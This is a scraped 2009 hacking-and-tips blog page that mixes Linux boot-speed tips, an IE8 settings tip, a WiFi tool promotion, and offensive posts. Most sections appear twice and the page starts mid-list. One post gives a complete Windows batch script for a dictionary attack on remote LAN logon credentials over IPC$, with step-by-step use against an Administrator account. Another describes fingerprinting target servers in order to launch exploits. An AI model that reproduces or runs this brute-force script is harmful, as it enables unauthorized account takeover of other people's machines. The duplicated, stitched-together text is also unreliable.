Hotplug is the system that allows you to plug in new devices and use them immediately. If you know your server won't need this system, delete it. This will cut down on boot time. On many systems, hotplugging consumes much of the boot time. Removing hotplug will vary depending upon the distribution you use. NOTE: udev has, for the most part, replaced hotplug. But if you're running an older distribution, this does apply.
#9: If you are REALLY daring, you could give initng a try
The initng system serves as a replacement for the sysvinit system and promises to drastically decrease boot times in UNIX-like operating systems. If you would like to see the initng system in action, you can give the Pingwinek livecd a try.
#10: Use a hack with Debian
If you're using Debian, there is a simple hack you can use to switch your startup scripts to run in parallel. If you look at the /etc/init.d/rc script, you will see: CONCURRENCY=none around line 24. Change this line to CONCURRENCY=shell and you should see a reduction in boot times. That's about it. Of course there are always more and better hacks out there. But the above should mostly cover everything. The good news is that you're most likely already running Linux, so the burden of boot times is generally eased by the infrequency of reboots.
#1: Disable unnecessary services
Depending upon the use of the machine, plenty of services won't be needed. Using Linux just for a desktop? Then you won't need sendmail, httpd, and many other services. If your server is only a web server, you can shut off many services as well. To do this, you can go to the Administration menu and take a look at the Services entry. Just deselect all of the services you don't want to start.
#2: Disable unnecessary kernel modules
If your desktop is wired to the Ethernet, you don't need to have a wireless kernel module loaded. This task is a bit more difficult and will require a kernel recompilation, which is not the easiest task to undertake. To do this, you will need the kernel sources. Then, follow the standard steps for compiling a kernel. The difference is that you're going to go through your system and disable all of the modules you don't need. The best way to find out what kernel modules currently install and run on your system is to install Bootchart. Not only will this give you a good list of modules, it will illustrate for you what is happening during your system boot. You can also issue the command chkconfig -list | grep 3:on to find out what services are running. Once you know what loading modules you don't need, you can remove them during a kernel recompilation. While you're at it, compile the kernel to exactly match your architecture.
#3: Use a lightweight window manager instead of GNOME or KDE
I plug smaller footprint window managers for a reason - they drastically reduce graphical boot time. Instead of having to wait that extra 30 to 60 seconds for GNOME or KDE to boot up, why not wait two to 10 seconds for Enlightenment or XFCE to boot up? Not only will they save you boot time, they will save your memory and the headache of dealing with bloatware.
#4: Use a text-based login instead of a graphical login
Most of my Linux machines boot to run level 3 instead of run level 5. This will halt at the text-based login, where I only have to log in and issue startx to start my desktop of choice. The graphical logins do two things: increase load times and create headaches trying to recover from an X windows fubar.
#5: Use a lighter-weight distribution
Instead of loading the heavyweight Fedora, why not try a Gentoo, Arch, or Puppy Linux? The boot times for these smaller distributions are far faster than the more bloated Fedora (and even Ubuntu). Of the larger distributions, OpenSuSE claims to boot the fastest, but I have not personally tested this. Between the latest Fedora and Ubuntu, Ubuntu blows Fedora's boot times away (and that is out of the box).
#6: Use an OpenBIOS
If you're savvy enough to upgrade your PC's firmware, you might consider migrating to an open source BIOS. One caveat to using open firmware is that it allows Linux to actually initialize the hardware as it boots (instead of relying on the BIOS). On top of that, many open BIOSes can be configured to meet your machine's specific needs. If you don't go the open BIOS route, you can at least configure your BIOS to not search for a floppy drive that's not there or to boot directly to the first hard drive (instead of the CD drive first).
#7: Avoid dhcp
If you are working on a home network (or a small business network) where address lease isn't a problem, go with static IP addresses. This will keep your machine from having to call out to a dhcp server to get an IP address. If you take this approach, make sure you configure your /etc/resolve.conf to reflect your DNS server addresses as well.
#8: If you can spare it, get rid of hotplug
Hotplug is the system that allows you to plug in new devices and use them immediately. If you know your server won't need this system, delete it. This will cut down on boot time. On many systems, hotplugging consumes much of the boot time. Removing hotplug will vary depending upon the distribution you use. NOTE: udev has, for the most part, replaced hotplug. But if you're running an older distribution, this does apply.
#9: If you are REALLY daring, you could give initng a try
The initng system serves as a replacement for the sysvinit system and promises to drastically decrease boot times in UNIX-like operating systems. If you would like to see the initng system in action, you can give the Pingwinek livecd a try.
#10: Use a hack with Debian
If you're using Debian, there is a simple hack you can use to switch your startup scripts to run in parallel. If you look at the /etc/init.d/rc script, you will see: CONCURRENCY=none around line 24. Change this line to CONCURRENCY=shell and you should see a reduction in boot times. That's about it. Of course there are always more and better hacks out there. But the above should mostly cover everything. The good news is that you're most likely already running Linux, so the burden of boot times is generally eased by the infrequency of reboots.
LAN Remote user - Dictionary Attack (hack any system in lan)
Create and use this Batch file to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully. Just Follow the steps below, 1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with.bat extension.@echo off
if "%1''=="" goto fin
if "%2''=="" goto fin
del logfile.txt
FOR /F "tokens=1'' %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1 \ipc$ %%i /u:%1 \%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1 \ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done***** 3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username. The Syntax should be like this,...
C:\>LANbrute.bat 192.169.21.02 Administrator Where, LANbrute.bat - This is the Name of the batch file that resides in the C Drive. 192.169.21.02 - IP Address of the Target Computer. Administrator - Victim Account that you want to crack. 5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02 , by using the passwords from the file passlist.txt and will not stop until it finds a right match. 6. If the right password was found, then it will save it in a text file named 'output.txt' on the same directory.//Disclaimer : This is only meant for Educational Means, The owner[Roney] of this blog is not responsible for whatever you do with this.
You need a Dictionary text file to proceed further to launch this attack successfully. Just Follow the steps below, 1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with.bat extension.@echo off
if "%1''=="" goto fin
if "%2''=="" goto fin
del logfile.txt
FOR /F "tokens=1'' %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1 \ipc$ %%i /u:%1 \%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1 \ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done***** 3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username. The Syntax should be like this,...
C:\>LANbrute.bat 192.169.21.02 Administrator Where, LANbrute.bat - This is the Name of the batch file that resides in the C Drive. 192.169.21.02 - IP Address of the Target Computer. Administrator - Victim Account that you want to crack. 5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02 , by using the passwords from the file passlist.txt and will not stop until it finds a right match. 6. If the right password was found, then it will save it in a text file named 'output.txt' on the same directory.//Disclaimer : This is only meant for Educational Means, The owner[Roney] of this blog is not responsible for whatever you do with this.
Information Gathering using Firefox
The First and foremost step in hacking would be the " Information Gathering ", many of them use various different Tools for the network Reconnaissance, but here is a trick that reveals you how to gather Information about the target system just by using a Browser "Firefox". The Information Gathering includes the following basics,.... Domain name and IP address
Open Ports
Daemon Banner Grabbing
OS Finger Printing
Server name and Type Well, Domain name is the prime thing that you need, at least to identify the target, obtaining the IP address can be done just by pinging. For the Open port detection, you might better go for third party tools and once the open ports are obtained you can use the telnet for the Daemon Banner grabbing, to know what the actual process thats running on the port along with its version info, so that you can easily launch an exploit to compromise the security if the daemon running on the target is a vulnerable one. Here comes the real tough part " OS Fingerprinting ", most of them use 'Nmap' for obtaining OS info and also it is the right choice for doing so. " Whois " - database will reveal what type of server is running on the target machine, but you can find it out just by using Firefox. You can really launch hell a lot of exploits if you know the server type on the target machine, and if it is IIS 6.0 or lesser, then it would make the task easier. Open up the Firefox browser, and browse the target website just like a legitimate user, and once done with it open up a new tab (CTRL + T) and close the previous tab, type "about:cache" in the URL and hit enter and it will list you the following... Memory cache device
Disk cache device
Offline cache device
Down below the "Disk cache device" click on the link that says " List Cache Entries ",
there you can see a brief history of the sites that you visited. Click on your target site's link and it will display you the server type along with its version in a clear text, also you ca find the packet Header, Request method whether it is a Post or Get.
and down below you can analyze the payload of the datagram shown in hexa- decimal values.
This part is real interesting and looks similar to a Sniffer. Now you got the server type and its version, and now you can launch exploits according to the version.
Open Ports
Daemon Banner Grabbing
OS Finger Printing
Server name and Type Well, Domain name is the prime thing that you need, at least to identify the target, obtaining the IP address can be done just by pinging. For the Open port detection, you might better go for third party tools and once the open ports are obtained you can use the telnet for the Daemon Banner grabbing, to know what the actual process thats running on the port along with its version info, so that you can easily launch an exploit to compromise the security if the daemon running on the target is a vulnerable one. Here comes the real tough part " OS Fingerprinting ", most of them use 'Nmap' for obtaining OS info and also it is the right choice for doing so. " Whois " - database will reveal what type of server is running on the target machine, but you can find it out just by using Firefox. You can really launch hell a lot of exploits if you know the server type on the target machine, and if it is IIS 6.0 or lesser, then it would make the task easier. Open up the Firefox browser, and browse the target website just like a legitimate user, and once done with it open up a new tab (CTRL + T) and close the previous tab, type "about:cache" in the URL and hit enter and it will list you the following... Memory cache device
Disk cache device
Offline cache device
Down below the "Disk cache device" click on the link that says " List Cache Entries ",
there you can see a brief history of the sites that you visited. Click on your target site's link and it will display you the server type along with its version in a clear text, also you ca find the packet Header, Request method whether it is a Post or Get.
and down below you can analyze the payload of the datagram shown in hexa- decimal values.
This part is real interesting and looks similar to a Sniffer. Now you got the server type and its version, and now you can launch exploits according to the version.
Sunday, August 9, 2009
Microsoft Internet Explorer 8 Redisplay Warning When Closing Multiple Tabs
Force Internet Explorer 8 to warn you when closing the browser if multiple tabs are open in case it fails to do so.
By default, Internet Explorer 8 should warn you when you attempt to close the browser and multiple tabs are open. This helps prevent an "oops" if you meant to only close Bing while Twitter, Facebook, CNN, ESPN, and MalekTips are also open, for example.
If you tire of these warnings, the dialog box also contains an area you can check to "Always close all tabs". However, what if you later change your mind or accidentally check this box and didn't mean to? You can configure Internet Explorer 8 to show these warnings again later if desired:
1 . Access the Internet Options dialog box. If the menu bar is visible, you can select "Tools" - "Internet Options". If the Command Bar is visible, click the "Tools" button and select "Internet Options". If neither are available, try typing Alt + T then O.
Accessing Internet Explorer 8 options via the Command Bar
2. When the "Internet Options" dialog box appears, underneath "Tabs", click the "Settings" button.
3. The "Tabbed Browsing Settings" dialog box appears. Check "Warn me when closing multiple tabs".
Configuring Internet Explorer 8 to once again warn you when closing the browser if multiple tabs are opened.
4. Click "OK" on the dialog boxes to store your settings.
By default, Internet Explorer 8 should warn you when you attempt to close the browser and multiple tabs are open. This helps prevent an "oops" if you meant to only close Bing while Twitter, Facebook, CNN, ESPN, and MalekTips are also open, for example.
If you tire of these warnings, the dialog box also contains an area you can check to "Always close all tabs". However, what if you later change your mind or accidentally check this box and didn't mean to? You can configure Internet Explorer 8 to show these warnings again later if desired:
1 . Access the Internet Options dialog box. If the menu bar is visible, you can select "Tools" - "Internet Options". If the Command Bar is visible, click the "Tools" button and select "Internet Options". If neither are available, try typing Alt + T then O.
Accessing Internet Explorer 8 options via the Command Bar
2. When the "Internet Options" dialog box appears, underneath "Tabs", click the "Settings" button.
3. The "Tabbed Browsing Settings" dialog box appears. Check "Warn me when closing multiple tabs".
Configuring Internet Explorer 8 to once again warn you when closing the browser if multiple tabs are opened.
4. Click "OK" on the dialog boxes to store your settings.
Friday, August 7, 2009
Be Aware From HacKErS
Not only the computer sciences and programs develop very fast, the hackers can follow the changes and adapt them. They are also creating constantly their new tricks. Some of them were presented on a security conference in Las Vegas.
Using a public web-mail isn't very safe. Now, there is a program, with it they can log in into our e-mail account, send mails from it and monitor our incoming letters. The presenter's advice was to use web-mails which practise encryption. G-mail, for example, can be hacked with this program.
Another man opened a door - protected with entry-cards - with only a knife and a cheap microcontroller. He found flaws in the protocol between the sensors and the server. More and more buildings are built with these entry-cards systems because it's seems to be very safe. It's not.
These were only two tricks now, but how many more can be about we never get to know. So we have to take care and be aware to protect our information and data.
Using a public web-mail isn't very safe. Now, there is a program, with it they can log in into our e-mail account, send mails from it and monitor our incoming letters. The presenter's advice was to use web-mails which practise encryption. G-mail, for example, can be hacked with this program.
Another man opened a door - protected with entry-cards - with only a knife and a cheap microcontroller. He found flaws in the protocol between the sensors and the server. More and more buildings are built with these entry-cards systems because it's seems to be very safe. It's not.
These were only two tricks now, but how many more can be about we never get to know. So we have to take care and be aware to protect our information and data.
Tuesday, August 4, 2009
How to get Free WiFi access anywhere, anytime
Some things in life should be free. Easy WiFi Radar helps you find and connect to open wireless access points with a single mouseclick. It's WiFi for Dummies. And we're giving it away for your PC. If you have ever tried to use Windows XP's built-in connection manager, you know what a hassle it can be to quickly check your mail or browse the web on the go. You need to browse through a list of access points, find one that you can connect to, manually try to connect to it, confirm the connection and then wait. Even if it says that's it connected, often it doesn't open a webpage or you mail will stall. Easy WiFi Radar automates all of this. It's main goal is to let you get your mail or surf the web without having to go through all of the connection trouble, and without having to pull your creditcard. Just run it and it'll connect you for FREE to the internet. It doesn't get easier than this. Get your mail and browse the web without being charged. The ideal WiFi- tool for frequent travellers and mobile professionals. Easy WiFi Radar will connect to open hotspots automatically and shows you exactly what it is doing in a cool animated radar screen. Access points are represented as green, yellow or red dots. It plays a sound and opens your webbrowser as soons as it succesfully finds a free connection. Works on Windows XP and Windows Mobile, not on Vista.
Subscribe to:
Posts (Atom)
Follow Me... Stay Connected
MY STATS